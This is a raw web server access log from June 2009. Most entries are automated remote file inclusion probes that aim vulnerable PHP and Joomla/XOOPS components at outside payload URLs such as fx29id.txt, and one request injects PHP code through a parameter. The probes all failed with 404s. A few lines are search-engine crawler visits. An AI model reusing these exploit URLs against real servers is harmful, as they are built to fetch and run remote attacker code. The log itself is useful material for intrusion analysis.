74.52.113.18 - - [03/Jun/2009:19:00:32 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.52.113.18 - - [03/Jun/2009:19:01:00 -0500] "GET /logs/access_log.1239321600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
74.52.113.18 - - [03/Jun/2009:19:01:00 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.52.113.18 - - [03/Jun/2009:19:01:04 -0500] "GET /logs/access_log.1240876800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:19:01:07 -0500] "GET /src/index_image.inc.php?config[path_src_include]=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
65.55.106.145 - - [03/Jun/2009:19:01:09 -0500] "GET /logs/access_log.1169683200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.79.47.122 - - [03/Jun/2009:19:01:12 -0500] "GET /logs/src/index_image.inc.php?config[path_src_include]=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:19:01:12 -0500] "GET /logs/access_log.1238112000/src/index_image.inc.php?config[path_src_include]=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
119.93.90.155 - - [03/Jun/2009:19:01:20 -0500] "GET //components/com_moodle/moodle.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
119.93.90.155 - - [03/Jun/2009:19:01:20 -0500] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
119.93.90.155 - - [03/Jun/2009:19:01:20 -0500] "GET /logs/access_log.1240358400//components/com_moodle/moodle.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
119.93.90.155 - - [03/Jun/2009:19:01:21 -0500] "GET /logs/access_log.1239926400//components/com_moodle/moodle.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:19:01:46 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:19:01:46 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:19:01:46 -0500] "GET /logs/access_log.1240358400//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:19:01:46 -0500] "GET /logs/access_log.1239926400//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:19:01:48 -0500] "GET /logs/src/index_image.inc.php?config[path_src_include]=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:19:01:48 -0500] "GET /logs/access_log.1238112000/src/index_image.inc.php?config[path_src_include]=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:19:01:49 -0500] "GET /src/index_image.inc.php?config[path_src_include]=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
74.52.113.18 - - [03/Jun/2009:19:02:15 -0500] "GET /logs/access_log.1241654400//htmltonuke.php?filnavn=http://www.motherwellfc.co.uk/help/css/fx1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:04:20 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:04:20 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:04:20 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:04:20 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:04:58 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:04:58 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:04:58 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:04:58 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:05:15 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:05:15 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:05:16 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:05:16 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
119.93.90.155 - - [03/Jun/2009:19:08:03 -0500] "GET /logs/access_log.1242000000//components/com_moodle/moodle.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:08:38 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:08:38 -0500] "GET //include/mail.inc.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:08:47 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:08:47 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:09:08 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:09:08 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:09:08 -0500] "GET //include/mail.inc.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:09:08 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:19:12:44 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:19:12:44 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:19:12:44 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:19:12:44 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:17:34 -0500] "GET /logs/access_log.1239753600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:17:34 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:17:34 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:18:01 -0500] "GET /logs/access_log.1239753600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:18:01 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:18:01 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:18:07 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:18:07 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:18:07 -0500] "GET /logs/access_log.1239753600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:18:34 -0500] "GET /logs/access_log.1235952000//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:19:12 -0500] "GET /logs/access_log.1235952000//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:19:39 -0500] "GET /logs/access_log.1240358400//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:19:39 -0500] "GET //components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:19:39 -0500] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:19:44 -0500] "GET /logs/access_log.1242000000//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:19:19:44 -0500] "GET /logs/access_log.1235952000//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.55.208.136 - - [03/Jun/2009:19:20:55 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [03/Jun/2009:19:20:55 -0500] "GET /?D=A HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.19.107.26 - - [03/Jun/2009:19:21:06 -0500] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:21:06 -0500] "GET /logs/access_log.1240358400//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:21:06 -0500] "GET //components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:19:21:11 -0500] "GET /logs/access_log.1242000000//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:22:37 -0500] "GET //components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:22:37 -0500] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:22:37 -0500] "GET /logs/access_log.1240358400//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:19:22:43 -0500] "GET /logs/access_log.1242000000//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.55.106.215 - - [03/Jun/2009:19:23:26 -0500] "GET /logs/access_log.1124496000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.185 - - [03/Jun/2009:19:29:38 -0500] "GET /logs/access_log.1192838400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.153.212.195 - - [03/Jun/2009:19:30:10 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:19:30:15 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:19:30:18 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
93.187.232.116 - - [03/Jun/2009:19:33:55 -0500] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.19.45.2 - - [03/Jun/2009:19:34:10 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.19.45.2 - - [03/Jun/2009:19:34:10 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.19.45.2 - - [03/Jun/2009:19:34:15 -0500] "GET /logs/access_log.1237852800/modules/My_eGallery/index.php?basepath=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.19.45.2 - - [03/Jun/2009:19:34:22 -0500] "GET /logs/access_log.1228521600/modules/My_eGallery/index.php?basepath=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.19.45.2 - - [03/Jun/2009:19:34:22 -0500] "GET /logs/access_log.1230681600/modules/My_eGallery/index.php?basepath=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:19:35:29 -0500] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:19:35:29 -0500] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:19:35:29 -0500] "GET /logs/access_log.1234569600/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:19:35:29 -0500] "GET /logs/access_log.1238284800/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.249.65.36 - - [03/Jun/2009:19:41:04 -0500] "GET / HTTP/1.1" 200 3245 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
122.153.212.195 - - [03/Jun/2009:19:41:55 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:19:41:59 -0500] "GET /logs/access_log.1239926400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:19:42:00 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:19:42:04 -0500] "GET /logs/access_log.1240358400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:45:12 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:45:12 -0500] "GET //include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:45:12 -0500] "GET /logs/access_log.1242000000//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:45:30 -0500] "GET /logs/access_log.1242000000//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:45:30 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:19:45:30 -0500] "GET //include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
190.144.44.36 - - [03/Jun/2009:19:45:46 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:19:45:46 -0500] "GET //admin/include/lib.module.php?mod_root=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
62.140.23.192 - - [03/Jun/2009:19:51:21 -0500] "GET /logs/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
62.140.23.192 - - [03/Jun/2009:19:51:21 -0500] "GET /ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.140.23.192 - - [03/Jun/2009:19:52:41 -0500] "GET /littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
62.140.23.192 - - [03/Jun/2009:19:52:41 -0500] "GET /logs/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.140.23.192 - - [03/Jun/2009:19:52:42 -0500] "GET /logs/access_log.1231545600/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.23.192 - - [03/Jun/2009:19:52:56 -0500] "GET /logs/access_log.1233187200/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:19:54:47 -0500] "GET /logs/access_log.1239753600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:19:54:47 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:19:54:47 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:19:55:48 -0500] "GET /logs/access_log.1235952000//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
62.140.23.192 - - [03/Jun/2009:19:57:34 -0500] "GET /logs/access_log.1234224000/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.23.192 - - [03/Jun/2009:19:57:48 -0500] "GET /logs/access_log.1237680000/littleshell.shtm=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.49.99.7 - - [03/Jun/2009:19:58:06 -0500] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://bangkokchurch.com/cache/office1.jpg??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.49.99.7 - - [03/Jun/2009:19:58:06 -0500] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://bangkokchurch.com/cache/office1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.49.99.7 - - [03/Jun/2009:19:58:08 -0500] "GET /logs/access_log.1233532800//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://bangkokchurch.com/cache/office1.jpg??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
91.121.167.8 - - [03/Jun/2009:20:03:46 -0500] "GET /logs/index2.php?p=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
91.121.167.8 - - [03/Jun/2009:20:03:46 -0500] "GET /index2.php?p=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
91.121.167.8 - - [03/Jun/2009:20:05:39 -0500] "GET /logs/index2.php?p=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
91.121.167.8 - - [03/Jun/2009:20:05:39 -0500] "GET /index2.php?p=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
91.121.167.8 - - [03/Jun/2009:20:05:49 -0500] "GET /logs/index2.php?p=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
91.121.167.8 - - [03/Jun/2009:20:05:49 -0500] "GET /index2.php?p=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
200.162.193.82 - - [03/Jun/2009:20:10:14 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:20:10:14 -0500] "GET /logs/access_log.1240185600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:20:10:14 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:20:10:49 -0500] "GET //include/admin.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
